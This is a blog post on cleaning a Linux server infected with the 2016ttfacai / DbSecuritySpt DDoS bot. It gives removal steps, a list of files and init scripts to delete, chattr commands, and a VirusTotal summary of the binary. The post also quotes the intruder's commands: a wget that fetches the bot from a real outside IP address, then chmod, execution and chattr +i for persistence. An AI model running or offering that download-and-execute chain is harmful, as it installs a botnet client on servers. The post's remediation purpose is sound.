Hacked: OUTBOUND DDOS attack 2016ttfacai  or DBsecurityspt SOLVED

If you detected an outbound denial of service attack originating from your server and its impacted your website. If you discover that a process internal to your server is sending large amounts of malicious traffic towards other servers and your service provider applied network restrictions to your server to mitigate this issue. Here is the way to solve this:-
Step 1: Put network restriction on your server for outgoing traffic. If you are using the Linux firewall
Go to 3rd Outgoing packets (OUTPUT) – Only applies to packets originated by this host

2016ttfacaii

Step 2: First create backup image of your server so that your data is not lost: CREATE SNAPSHOT

Step 3: If you are using Webmin look for BOOTUP and SHUTDOWN in System and look for Service “DBsecurity” If yes then your system is compromised
You will find service call 2016ttfacai is running and when you tried to kill. It will start again!
How to fix or Kill this Alien?
How to Kill 2016ttfacai
Step1: Create new virtual server and restore your backup snapshot created above.
Step2: Delete all the files from the following folder
1. /root/2016ttfacai
2. ./etc/init.d/DbSecuritySpt
3. etc/rc3.d/S97DbSecuritySpt
4. ./etc/rc3.d/S97DbSecuritySpt
5. ./etc/rc5.d/S97DbSecuritySpt
6. /temp/gates.lod/temp/mod.lod
7. /root/Conf.n

Manually stop all DBsecurityspt and 2016ttfacai from Services and Boot & Shutdown process
Repeat step2 again after stopping all the services
Step 3: Restart your server and see if above service are still running.

Outbound ddos attack

Note: If you are not able to delete files you need to running following command
# lsattr

if you notice i or a for 2016ttfacai
# man chattr
# chattr -i [filename] # chattr -a [filename]

Here what you can also check the commands run by the Alien
ps -ef
passwd
wget http://202.146.220.76:7777/2016ttfacai
chmod +x 2016ttfacai
./2016ttfacai
chattr +i 2016ttfacai
./etc/init.d/DbSecuritySpt:/root/2016ttfacai
./etc/rc3.d/S97DbSecuritySpt:/root/2016ttfacai
./etc/rc5.d/S97DbSecuritySpt:/root/2016ttfacai
./etc/rc4.d/S97DbSecuritySpt:/root/2016ttfacai
./etc/rc1.d/S97DbSecuritySpt:/root/2016ttfacai
Process: Summary:
11126
root 73.50 MB /root/2016ttfacai

If you succeeded in deleting the Alien and stopping all the services after restarting your server. Swap your ip with old server and delete old server.
Excellent you are back in business!!!
Say thank you to author

Details of 2016ttfacai:
https://www.virustotal.com/en/file/af67803032e08cfff4788a11693a9c96045bf35498faf126c8d8f20c1c6a3861/analysis/1459952498/
SHA256:af67803032e08cfff4788a11693a9c96045bf35498faf126c8d8f20c1c6a3861File name:2016ttfacaiDetection ratio:29 / 57Analysis date:2016-04-06 14:21:38 UTC ( 1 month, 3 weeks ago ) View latest
Class ELF32
Data 2’s complement, little endian
Header version 1 (current)
OS ABI UNIX – System V
ABI version 0
Object file type EXEC (Executable file)
Required architecture Intel 80386
Object file version 0x1
Program headers 5
Section headers 28
Name Type Address Offset Size Flags
NULL 0x00000000 0x00000000 0
.note.ABI-tag NOTE 0x080480d4 0x000000d4 32 A
.init PROGBITS 0x080480f4 0x000000f4 23 A, X
.text PROGBITS 0x08048120 0x00000120 744640 A, X
__libc_thread_freeres_fn PROGBITS 0x080fdde0 0x000b5de0 226 A, X
__libc_freeres_fn PROGBITS 0x080fdec4 0x000b5ec4 3950 A, X
.fini PROGBITS 0x080fee34 0x000b6e34 26 A, X
.rodata PROGBITS 0x080fee60 0x000b6e60 120986 A
__libc_atexit PROGBITS 0x0811c6fc 0x000d46fc 4 A
__libc_subfreeres PROGBITS 0x0811c700 0x000d4700 60 A

MIMEType
application/octet-stream

CPUByteOrder
Little endian

CPUArchitecture
32 bit

FileType
ELF executable

ObjectFileType
Executable file

CPUType
i386

The post DDOS attack 2016ttfacai or DBsecurityspt appeared first on IT Asset Management Software.